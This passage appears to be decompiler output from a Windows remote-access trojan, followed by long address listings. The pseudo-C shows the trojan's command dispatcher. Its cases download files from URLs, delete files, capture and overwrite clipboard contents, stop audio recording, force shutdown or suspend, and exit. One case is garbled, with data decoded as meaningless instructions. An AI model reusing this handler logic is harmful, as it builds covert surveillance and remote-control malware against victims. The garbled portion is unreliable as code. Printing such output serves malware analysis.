									__eax = L00401F8D(0x46c3e0, __eax);
									__ecx = 0x46c350;
									goto L33;
								case 0x14:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = L00408FF2(0x46c350, __edx);
									goto L35;
								case 0x15:
									__esi = 0x46c350;
									__ecx = 0x46c350;
									__eax = L00409D38(0x46c350);
									__ecx = 0x46c350;
									L33:
									__eax = L00408EA0(__ebx, __ecx);
									goto L125;
								case 0x16:
									__eflags =  *0x46bafd - __bl;
									asm("sbb eax, 0x46bafd");
									if(__eflags == 0) {
										__edx = 0;
										__cl = 0;
										__eax = E0040AA16(0);
									}
									goto L125;
								case 0x17:
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c1b8;
									__eax = L00401F8D(0x46c1b8, __eax);
									__ecx = 0x46c1d0;
									__eax = E00404955(0x46c1d0);
									__esp = __esp - 0x10;
									__esi = 0x46bacc;
									__edi = __esp;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi = 0x46c1d0;
									__ecx = 0x46c1d0;
									__eax = E004049D2(__edx);
									__esp = __esp - 0x18;
									__ecx = __esp;
									_push(0x46c1b8);
									__eflags =  *0x46baaa - __bl;
									if(__eflags == 0) {
										__eax = E004020CC(0, __ecx, __edx, __eflags);
									} else {
										__eax = E004020CC(0, __ecx, __edx, __eflags);
									}
									__ecx = __esi;
									__eax = E00404A6E(__ebx, __esi, __edx, __eflags);
									__ecx = __esi;
									__eax = E00404B88(__ecx, __edx, 0x404518, __ebx);
									goto L125;
								case 0x18:
									__eax =  *0x46bac0();
									__ecx = 0x46c1d0;
									__eax = L00404DD5(0x46c1d0);
									goto L125;
								case 0x19:
									__ebx = 0;
									__ecx =  &_v420;
									 *0x46ba74 = __bl;
									__eax = L00401E29( &_v420, __edx, __eflags, 3);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(0, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 2);
									__eax = L00401F75(__ecx);
									_push(__eax);
									__ecx =  &_v432;
									__ecx = L00401E29( &_v432, __edx, __eflags, 1);
									__eax = L00401F75(__ecx);
									__eax = E00436079(__ecx, __eax);
									__ecx =  &_v436;
									__esi = __eax;
									__ecx = L00401E29( &_v436, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__eax = E00436079(__ecx, __eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E004016D8(__ecx, __edx, __edi, __esi);
									goto L125;
								case 0x1a:
									_push( *0x46bab8);
									__eax = __eax ^ 0x0046bab8;
									 *0x46ba74 = 1;
									waveInStop(??) = waveInClose( *0x46bab8);
									goto L125;
								case 0x1b:
									 *0x46bd6c =  *0x46bd6c + 1;
									__eflags =  *0x46bd6c;
									__eax = 0x46bd6c + __eax;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 1);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx =  &_v428;
									__eax = L00401E29( &_v428, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = L0040FB78(__edx);
									__esp = __esp + 0x30;
									L35:
									 *0x46bd6c =  *0x46bd6c - 1;
									goto L125;
								case 0x1c:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									L00401F75(__ecx) = DeleteFileW(__eax);
									goto L125;
								case 0x1d:
									__eax = L0040FB4B();
									ExitProcess(0);
								case 0x1e:
									while(1) {
										__eflags =  *0x46bd6c - __ebx;
										if( *0x46bd6c == __ebx) {
											break;
										}
										Sleep(0x64);
									}
									_pop(__edx);
									 *__eax =  *__eax | __eax;
									__al = __al + __ch;
									__eflags = __al;
									E0040B107();
									asm("adc bl, [esi]");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x12ffbee1)) =  *((intOrPtr*)(__eax - 0x12ffbee1)) + __bl;
									 *__ecx =  *__ecx - __al;
									asm("popad");
									__eax = __eax - 0x2d610041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x1affbee1)) =  *((intOrPtr*)(__ecx - 0x1affbee1)) + __ah;
									_pop(ds);
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0xa004120)) =  *((intOrPtr*)(__eax + 0xa004120)) + __cl;
									 *__ecx =  *__ecx & __al;
									asm("das");
									 *__ecx =  *__ecx & __al;
									_push(__esi);
									 *__ecx =  *__ecx & __al;
									_pop(__edx);
									 *__ecx =  *__ecx & __al;
									_t170 = __eax;
									__eax = __edx;
									__edx = _t170;
									 *__ecx =  *__ecx & __al;
									asm("in al, dx");
									 *__ecx =  *__ecx & __al;
									 *[cs:ecx] =  *[cs:ecx] & __eax;
									_push(__edi);
									 *__ecx =  *__ecx & __eax;
									asm("aam 0x21");
									__ecx = __ecx + 1;
									__al = __al + __ah;
									 *__ecx =  *__ecx & __eax;
									__eax = __eax + 0x14004122;
									__al = __al &  *__ecx;
									__esp = __esp &  *__edx;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x22)) =  *((intOrPtr*)(__eax + 0x22)) + __cl;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x22)) =  *((intOrPtr*)(__ecx + 0x22)) + __bh;
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __dh;
									 *__ecx =  *__ecx - __eax;
									asm("popad");
									__eax = __eax - 0x2d610041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0xffbede)) =  *((intOrPtr*)(__ecx - 0xffbede)) + __cl;
									__al = __al &  *__ecx;
									asm("adc al, 0x23");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax - 0x4bffbedd)) =  *((intOrPtr*)(__eax - 0x4bffbedd)) + __dl;
									__eax = __eax &  *__ecx;
									asm("repe and eax, [ecx]");
									asm("adc [ecx+eax*2], esp");
									 *__esi =  *__esi + __ah;
									__al = __al & 0x00000041;
									__ebx->i = __ebx->i + __dh;
									__al = __al & 0x00000041;
									_a32 = _a32 + __al;
									__ecx = __ecx + 1;
									__bl = __bl + __dl;
									__al = __al & 0x00000041;
									 *((intOrPtr*)(__esi + 0x25)) =  *((intOrPtr*)(__esi + 0x25)) + __al;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__eax + 0x3f004125)) =  *((intOrPtr*)(__eax + 0x3f004125)) + __bl;
									asm("daa");
									__ecx = __ecx + 1;
									_a603996450 = _a603996450 + __ah;
									asm("daa");
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx - 0x40ffbed9)) =  *((intOrPtr*)(__ecx - 0x40ffbed9)) + __ah;
									asm("daa");
									__ecx = __ecx + 1;
									__ebx->i = __ebx->i + __cl;
									 *__ecx =  *__ecx - __al;
									asm("adc eax, 0x35004128");
									 *__ecx =  *__ecx - __al;
									_push(__ebp);
									 *__ecx =  *__ecx - __al;
									__eflags =  *__ecx;
									if( *__ecx == 0) {
										__ecx = __ecx + 1;
										__ch = __ch + __cl;
										 *__ecx =  *__ecx - __al;
										asm("popad");
										__eax = __eax - 0x29170041;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edx - 0x50ffbed6)) =  *((intOrPtr*)(__edx - 0x50ffbed6)) + __cl;
										__al = __al -  *__ecx;
										asm("scasd");
										__eax = __eax -  *__ecx;
										asm("daa");
										__al = __al - 0x41;
										 *((intOrPtr*)(__edi + 0x2c)) =  *((intOrPtr*)(__edi + 0x2c)) + __al;
										__ecx = __ecx + 1;
										 *((intOrPtr*)(__edi + 0x2a)) =  *((intOrPtr*)(__edi + 0x2a)) + __ah;
										__ecx = __ecx + 1;
										__bh = __bh + __ah;
										__eax = __eax -  *__ecx;
										__eflags = __eax;
									}
									__ecx = __ecx + 1;
									 *__edi =  *__edi + __al;
									__al = __al - 0x41;
									__ch = __ch + __ch;
									__al = __al - 0x41;
									__ah = __ah + __dh;
									__al = __al - 0x41;
									__bl = __bl + __bh;
									__al = __al - 0x41;
									 *((intOrPtr*)(__esi + 0x6700412c)) =  *((intOrPtr*)(__esi + 0x6700412c)) + __bh;
									__al = __al - 0x41;
									 *__edx =  *__edx + __al;
									__eax = __eax - 0x2c710041;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__edi - 0x59ffbed5)) =  *((intOrPtr*)(__edi - 0x59ffbed5)) + __bl;
									__eax = __eax -  *__ecx;
									__al = __al ^ 0x0000002b;
									__ecx = __ecx + 1;
									 *((intOrPtr*)(__ecx + 0x2d)) =  *((intOrPtr*)(__ecx + 0x2d)) + __ah;
									__ecx = __ecx + 1;
									 *__eax =  *__eax + __al;
									asm("adc al, [ecx]");
									asm("adc al, [edx]");
									__edx = __edx +  *__edx;
									__al = __al + 5;
									_push(es);
									_pop(es);
									asm("adc dl, [edx]");
									asm("adc cl, [eax]");
									 *__edx =  *__edx | __ecx;
									asm("adc cl, [ebx]");
									__al = __al | 0x00000012;
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									asm("adc dl, [edx]");
									__eax = __eax | 0x12100f0e;
									asm("adc dl, [edx]");
									asm("adc [esi-0x75], edx");
									_push(__esi);
									__esi = __ecx;
									__ecx = __esi + 4;
									E00404818(__ebx, __esi + 4, 0) = __esi;
									_pop(__esi);
									return __esi;
									goto L130;
								case 0x1f:
									__eax = E0040B80B(__ebx, __eflags);
									goto L125;
								case 0x20:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E29( &_v424, __edx, __eflags, 1);
									__eax = L00401F75(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E004179B3( &_v408, __edx, __eax);
									_push(0);
									_push(0);
									__ecx =  &_v408;
									_push(L00401ECB( &_v408));
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 2);
									__eax = L00401F75(__eax);
									_push(__eax);
									_push(0);
									__imp__URLDownloadToFileW();
									__eflags = __eax;
									if(__eflags == 0) {
										goto L57;
									}
									goto L105;
								case 0x21:
									while(1) {
										__eflags =  *0x46bd6c - __ebx; // 0x0
										if(__eflags == 0) {
											break;
										}
										Sleep(0x64);
									}
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = L00401E29( &_v424, __edx, __eflags, 1);
									__eax = L00401F75(__eax);
									__dl =  *__esi;
									__ecx =  &_v408;
									__eax = E004179B3( &_v408, __edx, __eax);
									__ecx =  &_v408;
									__eax = L00401ECB( &_v408);
									__ecx =  &_v428;
									__esi = __eax;
									__eax = L00401E29( &_v428, __edx, __eflags, 2);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = __esi;
									__eax = E004173A6(__esi);
									__esp = __esp + 0x18;
									__eflags = __al;
									if(__eflags != 0) {
										L57:
										__esp = __esp - 0x18;
										__eax =  &_v420;
										__ecx = __esp;
										E00407352(__ebx, __esp, __edx, __eflags,  &_v420) = E0040B465();
										__esp = __esp + 0x18;
									}
									goto L105;
								case 0x22:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 2);
									__eax = L00401F75(__ecx);
									__eax = __eax + 0x10000;
									__ecx =  &_v424;
									__ecx = L00401E29( &_v424, __edx, __eflags, 1);
									__eax = L00401F75(__eax);
									__ebx = 0;
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 0);
									L00401F75(__ecx) = MessageBoxW(0, __eax, __eax, __eax);
									goto L125;
								case 0x23:
									__eax = E004132F7();
									__ebx = 0;
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__edx = "0";
									__ecx = __eax;
									__eax = E00405A22(__edx);
									__ecx =  &_v424;
									_push(0);
									__eflags = __al;
									if(__eflags == 0) {
										__eax = L00401E29( &_v424, __edx, __eflags);
										__edx = "1";
										__ecx = __eax;
										__eax = E00405A22(__edx);
										__ecx =  &_v424;
										_push(0);
										__eflags = __al;
										if(__eflags == 0) {
											__eax = L00401E29( &_v424, __edx, __eflags);
											__edx = "2";
											__ecx = __eax;
											__eax = E00405A22(__edx);
											__eflags = __al;
											if(__eflags == 0) {
												__eax = LoadLibraryA("PowrProf.dll");
												__eax = GetProcAddress(__eax, "SetSuspendState");
												__ecx =  &_v420;
												__esi = __eax;
												__eax = L00401E29( &_v420, __edx, __eflags, 0);
												__edx = "3";
												__ecx = __eax;
												__eax = E00405A22(__edx);
												_push(0);
												__eflags = __al;
												if(__eflags == 0) {
													__ecx =  &_v420;
													__eax = L00401E29( &_v420, __edx, __eflags);
													__edx = "4";
													__ecx = __eax;
													__eax = E00405A22(__edx);
													__eflags = __al;
													if(__al != 0) {
														_push(0);
														_push(0);
														_push(1);
														goto L74;
													}
												} else {
													_push(0);
													_push(0);
													L74:
													__eax =  *__esi();
												}
											} else {
												_push(0);
												__ecx =  &_v420;
												__ecx = L00401E29( &_v420, __edx, __eflags, 1);
												__eax = L00401F75(__ecx);
												__eax = E00436079(__ecx, __eax);
												__eax = __eax | 0x00000002;
												__eflags = __eax;
												goto L69;
											}
										} else {
											__ecx = L00401E29( &_v424, __edx, __eflags, 1);
											__eax = L00401F75(__ecx);
											__eax = E00436079(__ecx, __eax);
											__eax = __eax | 0x00000001;
											goto L69;
										}
									} else {
										__ecx = L00401E29( &_v424, __edx, __eflags, 1);
										__eax = L00401F75(__ecx);
										__eax = E00436079(__ecx, __eax);
										L69:
										_pop(__ecx);
										__eax = ExitWindowsEx(__eax, ??);
									}
									goto L125;
								case 0x24:
									L80:
									__eax = OpenClipboard(__ebx);
									__eflags = __eax;
									if(__eax != 0) {
										__esi = GetClipboardData(0xd);
										__edi = GlobalLock(__esi);
										GlobalUnlock(__esi) = CloseClipboard();
										__eflags = __edi;
										 &E0045F714 =  !=  ? __edi :  &E0045F714;
										__ecx =  &_v400;
										__eax = E0040425F(__ebx,  &_v400,  !=  ? __edi :  &E0045F714);
										__esp = __esp - 0x18;
										__edx =  &_v404;
										__ecx = __esp;
										__eax = L00416CF4(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x46c768;
										__eax = E00404A6E(__ebx, 0x46c768, __edx, __eflags);
										L105:
										__ecx =  &_v400;
										L106:
										__eax = L00401ED0();
									}
									goto L125;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v420;
										__ecx = L00401E29( &_v420, __edx, __eflags, 0);
										__eax = E00402469();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v424;
										__esi = __eax;
										__ecx = L00401E29( &_v424, __edx, __eflags, 0);
										__eax = E00402469();
										__ecx =  &_v428;
										__ecx = L00401E29( &_v428, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L79;
									}
									goto L125;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L79:
										__eax = CloseClipboard();
										goto L80;
									}
									goto L125;
								case 0x27:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = __eax;
									__eax = E0040A15B(__ecx);
									goto L125;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v420;
									_v404 = 0;
									_v408 = 0;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E00416A69(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__ecx = _v408;
										E0040A15B(_v408) = L00438E01(_v408);
										L26:
										_pop(__ecx);
									}
									goto L125;
								case 0x29:
									__eax = E0040AACF(__edx);
									goto L125;
								case 0x2a:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0041365F(__edx);
									goto L102;
								case 0x2b:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004111E1(__edx);
									goto L102;
								case 0x2c:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00405331(__edx);
									goto L102;
								case 0x2d:
									_push(__ecx);
									__esi = 0x46c560;
									__ecx = 0x46c560;
									__eax = E00402469();
									__ecx = 0x46c560;
									__eax = L00401F75(0x46c560);
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									E00402469() = __eax + 1;
									__ecx =  &_v424;
									__ecx = L00401E29( &_v424, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx = 0x46c518;
									__edx = L00401F75(0x46c518);
									__eax = E00410670(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L102;
								case 0x2e:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0040F1DB(__edx);
									goto L102;
								case 0x2f:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0041553B(__edx);
									L102:
									goto L125;
							}
						}
					}
				}
				L130:
			}

0x00411d70
0x00411d70
0x00411d70
0x00411d80
0x00411d82
0x00411d8a
0x00411d92
0x00411daf
0x00411db9
0x00411dbe
0x00411dc9
0x00411dce
0x00411ddb
0x00411de4
0x00411dee
0x00411df1
0x00411df3
0x00412a4a
0x00412a50
0x00412a53
0x00412a60
0x00000000
0x00412a8c
0x00412a95
0x00412a97
0x00412aa3
0x00412aa5
0x00000000
0x00000000
0x00412ab1
0x00412aba
0x00412abc
0x00412ac2
0x00412aca
0x00412ace
0x00412ad5
0x00412ad7
0x00412add
0x00412adf
0x00412ae3
0x00412ae9
0x00412aed
0x00412af4
0x00412af8
0x00412afa
0x00412aff
0x00412b02
0x00412b05
0x00412b0a
0x00412b0c
0x00412b11
0x00412b14
0x00412b1d
0x00412b1f
0x00412b21
0x00000000
0x00000000
0x00412bb1
0x00412bba
0x00412bbc
0x00412bc4
0x00412bcd
0x00412bcf
0x00412bdc
0x00000000
0x00000000
0x00412c29
0x00412c2d
0x00412c32
0x00412c35
0x00412c3d
0x00000000
0x00000000
0x00412c49
0x00412c4d
0x00412c52
0x00412c55
0x00412c5d
0x00000000
0x00000000
0x00412a78
0x00412a7d
0x00000000
0x00000000
0x00412be9
0x00412bed
0x00412bf2
0x00412bf5
0x00412bfd
0x00000000
0x00000000
0x00412c09
0x00412c0d
0x00412c12
0x00412c15
0x00412c1d
0x00000000
0x00000000
0x00412ced
0x00000000
0x00000000
0x00412cf4
0x00000000
0x00000000
0x00412cfb
0x00000000
0x00000000
0x00412cbe
0x00412cc0
0x00412ccb
0x00412ccd
0x00412cd4
0x00412cd8
0x00412cda
0x00412cdd
0x00412ce2
0x00412ce4
0x00412ce6
0x00000000
0x00000000
0x00412c67
0x00000000
0x00000000
0x00412d02
0x00412d09
0x00412d0d
0x00412d0f
0x00412d14
0x00412d17
0x00412d1b
0x00412d1d
0x00412d2a
0x00412d2c
0x00412d36
0x00412d38
0x00412d3a
0x00412d40
0x00000000
0x00000000
0x00412c71
0x00412c78
0x00412cb3
0x00412c7a
0x00412c7a
0x00412c7c
0x00412c81
0x00412c8d
0x00412c93
0x00412c93
0x00000000
0x00000000
0x00412b9f
0x00000000
0x00000000
0x00412ba6
0x00412ba8
0x00412ba9
0x00000000
0x00000000
0x00412b34
0x00412b3b
0x00412b42
0x00412b46
0x00412b4b
0x00412b4e
0x00412b51
0x00412b58
0x00412b5c
0x00412b61
0x00412b64
0x00412b67
0x00412b6e
0x00412b72
0x00412b77
0x00412b7a
0x00412b7d
0x00412b82
0x00412b89
0x00412b8e
0x00412b95
0x00000000
0x00000000
0x00000000
0x00000000
0x00412a60
0x00000000
0x00411df9
0x00411df9
0x00412958
0x00412975
0x00412980
0x0041298a
0x0041299a
0x0041299a
0x0041299d
0x004129a2
0x004129a8
0x004129b3
0x004129be
0x004129db
0x004129f8
0x00412a04
0x00412a09
0x00412a11
0x00412a34
0x00412a34
0x00412a40
0x00000000
0x00411dff
0x00411dff
0x00411e03
0x00412d61
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a
0x00411e09
0x00411e0b
0x00000000
0x00411e1e
0x00411e38
0x00411e46
0x00411e54
0x00411eaf
0x00411eb3
0x00411ebe
0x00411ec2
0x00411ecb
0x00411ed7
0x00411ee3
0x00411eef
0x00411efb
0x00411f07
0x00411f13
0x00411f1c
0x00411f25
0x00411f3d
0x00411f45
0x00411f72
0x00411f77
0x00411f7e
0x00411f83
0x00411f85
0x00411f8b
0x00411f8c
0x00000000
0x00411f8c
0x00411f47
0x00411f49
0x00411f53
0x00411f63
0x00411f55
0x00411f56
0x00411f56
0x00411f53
0x00000000
0x00000000
0x00411f98
0x00411f9a
0x00411f8e
0x00411f8e
0x00000000
0x00000000
0x004128ed
0x004128f1
0x004128f6
0x004128f9
0x004128fb
0x004128fd
0x00412902
0x00412904
0x00412909
0x0041290e
0x00000000
0x00000000
0x00000000
0x00000000
0x00411fa8
0x00411faf
0x00411fb4
0x00411fb7
0x00411fbb
0x00411fbd
0x00411fc8
0x00411fca
0x00411fd4
0x00411fd6
0x00411fd8
0x00411fde
0x00412d45
0x00412d45
0x00412d4a
0x00412d4f
0x00412d53
0x00412d58
0x00412d5c
0x00000000
0x00000000
0x00411fe7
0x00411ff0
0x00411ff2
0x00411ffe
0x00412000
0x00000000
0x00000000
0x00412088
0x00412088
0x00000000
0x00000000
0x0041200c
0x00412015
0x00412017
0x00412024
0x00000000
0x00000000
0x0041202f
0x00000000
0x00000000
0x00412056
0x00412031
0x00412031
0x00412033
0x00412033
0x0041203c
0x0041203e
0x0041204b
0x00000000
0x00000000
0x0041205a
0x00412061
0x0041206a
0x0041206c
0x00412079
0x0041207f
0x00412083
0x00000000
0x00000000
0x00412092
0x00412094
0x004120a0
0x004120a2
0x004120a8
0x004120ac
0x004120b2
0x004120b7
0x004120c1
0x004120d4
0x004120da
0x004120de
0x004120e3
0x00000000
0x00000000
0x004120ee
0x004120f2
0x004120f8
0x004120fd
0x00412102
0x00412108
0x00412110
0x00412114
0x00412119
0x0041211c
0x00412124
0x00000000
0x00412124
0x00000000
0x00000000
0x00412130
0x00412132
0x0041213e
0x0041214c
0x00000000
0x00000000
0x00412159
0x0041215d
0x00412163
0x00412168
0x0041216f
0x00412178
0x0041217a
0x00412186
0x00412188
0x00412190
0x00412199
0x0041219b
0x004121a1
0x004121a7
0x004121a9
0x004121af
0x004121af
0x004121af
0x004121b7
0x004121bf
0x004121c5
0x004121c7
0x004121c9
0x00000000
0x00000000
0x004121d4
0x004121d5
0x004121da
0x004121dc
0x004121dc
0x00000000
0x00000000
0x004121e2
0x004121e6
0x004121eb
0x004121ee
0x004121f1
0x004121f6
0x004121fb
0x00000000
0x00000000
0x00412205
0x0041220a
0x00000000
0x00000000
0x00412214
0x00412219
0x00000000
0x00000000
0x00412225
0x00412229
0x0041222f
0x00412234
0x00412239
0x00000000
0x00000000
0x00412248
0x00412248
0x0041224e
0x00412254
0x00412259
0x0041225c
0x0041225f
0x00412264
0x00412269
0x00000000
0x00000000
0x00412279
0x0041227e
0x00412280
0x00412285
0x0041223e
0x0041223e
0x00000000
0x00000000
0x00412937
0x00412938
0x0041293d
0x00412943
0x00412945
0x00412947
0x00412947
0x00000000
0x00000000
0x00412289
0x0041228b
0x00412290
0x00412296
0x0041229b
0x004122a0
0x004122a5
0x004122aa
0x004122ad
0x004122b2
0x004122b4
0x004122b5
0x004122b6
0x004122b7
0x004122b8
0x004122bd
0x004122bf
0x004122c4
0x004122c7
0x004122c9
0x004122ce
0x004122d4
0x004122df
0x004122d6
0x004122d6
0x004122db
0x004122e6
0x004122e8
0x004122f3
0x004122f5
0x00000000
0x00000000
0x004122ff
0x00412305
0x0041230a
0x00000000
0x00000000
0x00412314
0x00412316
0x0041231c
0x00412322
0x00412327
0x0041232a
0x0041232d
0x00412334
0x0041233d
0x0041233f
0x0041234b
0x0041234e
0x00412357
0x00412359
0x0041235f
0x00412366
0x0041236a
0x00412371
0x00412373
0x00412379
0x0041237f
0x00412381
0x00412383
0x00000000
0x00000000
0x00412390
0x00412391
0x00412396
0x004123a9
0x00000000
0x00000000
0x004123b4
0x004123b4
0x004123b5
0x004123ba
0x004123c0
0x004123c5
0x004123c8
0x004123cb
0x004123d2
0x004123d6
0x004123db
0x004123de
0x004123e6
0x004123eb
0x0041226e
0x0041226e
0x00000000
0x00000000
0x004123f5
0x004123fe
0x00412406
0x00000000
0x00000000
0x00412411
0x00412418
0x00000000
0x00412426
0x00412426
0x0041242c
0x00000000
0x00000000
0x00412420
0x00412420
0x0041242f
0x00412430
0x00412432
0x00412432
0x00412d8d
0x00412d94
0x00412d96
0x00412d97
0x00412d9d
0x00412da0
0x00412da1
0x00412da6
0x00412da7
0x00412dad
0x00412dae
0x00412daf
0x00412db5
0x00412db8
0x00412db9
0x00412dbc
0x00412dbd
0x00412dc0
0x00412dc1
0x00412dc4
0x00412dc4
0x00412dc4
0x00412dc5
0x00412dc8
0x00412dc9
0x00412dcc
0x00412dd0
0x00412dd1
0x00412dd4
0x00412dd6
0x00412dd7
0x00412dd9
0x00412ddc
0x00412de1
0x00412de4
0x00412de6
0x00412de7
0x00412dea
0x00412deb
0x00412dee
0x00412def
0x00412df1
0x00412df4
0x00412df5
0x00412dfa
0x00412dfb
0x00412e01
0x00412e04
0x00412e06
0x00412e07
0x00412e0d
0x00412e10
0x00412e14
0x00412e17
0x00412e19
0x00412e1b
0x00412e1d
0x00412e1f
0x00412e22
0x00412e23
0x00412e25
0x00412e27
0x00412e2a
0x00412e2b
0x00412e31
0x00412e32
0x00412e33
0x00412e39
0x00412e3a
0x00412e3b
0x00412e41
0x00412e42
0x00412e43
0x00412e45
0x00412e48
0x00412e4d
0x00412e50
0x00412e51
0x00412e51
0x00412e54
0x00412e56
0x00412e57
0x00412e59
0x00412e5c
0x00412e5d
0x00412e62
0x00412e63
0x00412e69
0x00412e6c
0x00412e6d
0x00412e70
0x00412e71
0x00412e73
0x00412e76
0x00412e77
0x00412e7a
0x00412e7b
0x00412e7d
0x00412e7d
0x00412e7d
0x00412e7e
0x00412e7f
0x00412e81
0x00412e83
0x00412e85
0x00412e87
0x00412e89
0x00412e8b
0x00412e8d
0x00412e8f
0x00412e95
0x00412e97
0x00412e99
0x00412e9e
0x00412e9f
0x00412ea5
0x00412ea8
0x00412eaa
0x00412eab
0x00412eae
0x00412eaf
0x00412eb1
0x00412eb3
0x00412eb5
0x00412eb7
0x00412eb9
0x00412eba
0x00412ebb
0x00412ebd
0x00412ebf
0x00412ec1
0x00412ec3
0x00412ec5
0x00412ec7
0x00412ec9
0x00412ecb
0x00412ed0
0x00412ed2
0x00412ed3
0x00412ed4
0x00412ed8
0x00412ee0
0x00412ee2
0x00412ee3
0x00000000
0x00000000
0x00412433
0x00000000
0x00000000
0x00412445
0x00412445
0x0041244b
0x00000000
0x00000000
0x0041243f
0x0041243f
0x0041244d
0x0041244f
0x00412459
0x0041245b
0x00412462
0x00412466
0x0041246d
0x0041246f
0x00412474
0x00412476
0x0041247b
0x00412481
0x00412482
0x00412483
0x0041248c
0x0041248f
0x00412498
0x0041249a
0x0041249f
0x004124a0
0x004124a1
0x004124a7
0x004124a9
0x00000000
0x00000000
0x00000000
0x00000000
0x004124d3
0x004124d3
0x004124d9
0x00000000
0x00000000
0x004124cd
0x004124cd
0x004124dd
0x004124e6
0x004124e8
0x004124ef
0x004124f3
0x004124fa
0x004124fc
0x00412501
0x00412503
0x00412508
0x0041250e
0x00412512
0x00412519
0x0041251d
0x0041251f
0x00412524
0x00412527
0x0041252a
0x0041252f
0x00412531
0x00412536
0x00412539
0x0041253b
0x004124af
0x004124af
0x004124b2
0x004124b6
0x004124be
0x004124c3
0x004124c3
0x00000000
0x00000000
0x00412548
0x00412551
0x00412553
0x0041255f
0x00412564
0x00412570
0x00412572
0x00412578
0x0041257a
0x00412584
0x0041258d
0x00000000
0x00000000
0x00412598
0x0041259d
0x0041259f
0x004125a4
0x004125a9
0x004125ae
0x004125b0
0x004125b5
0x004125b9
0x004125ba
0x004125bc
0x004125d4
0x004125d9
0x004125de
0x004125e0
0x004125e5
0x004125e9
0x004125ea
0x004125ec
0x00412607
0x0041260c
0x00412611
0x00412613
0x00412618
0x0041261a
0x0041264f
0x00412656
0x0041265d
0x00412661
0x00412663
0x00412668
0x0041266d
0x0041266f
0x00412674
0x00412675
0x00412677
0x0041267d
0x00412681
0x00412686
0x0041268b
0x0041268d
0x00412692
0x00412694
0x0041269a
0x0041269b
0x0041269c
0x00000000
0x0041269c
0x00412679
0x00412679
0x0041267a
0x0041269e
